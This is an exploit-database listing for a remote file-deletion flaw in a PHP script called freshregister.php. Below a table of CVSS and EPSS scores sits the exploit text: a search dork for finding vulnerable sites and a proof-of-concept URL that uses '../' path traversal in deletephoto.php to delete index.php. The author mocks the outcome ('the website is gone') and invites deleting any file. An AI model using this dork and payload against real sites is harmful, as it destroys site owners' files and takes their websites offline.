Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-284 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-02-28 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 0.0875 | 0.67482 |
############################################################################## # Title: freshregister.php remote file deleting # vendor: n/a # Exploit Author : Guardiran Security Team # Tested On : ubuntu / Windows 8.1 # # Dork: inurl:freshregister.php # # ----------------------------------------------- # # # Description : # an authenticated user profile pic remover can delete the whole website and config files # # # # Poc: # http://sitedomain.com/deletephoto.php?Choice=1&op=../index.php # and the website is gone :))) # # # # # you can delete what ever you want such as pics or files :)) # # # # # # ##############################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.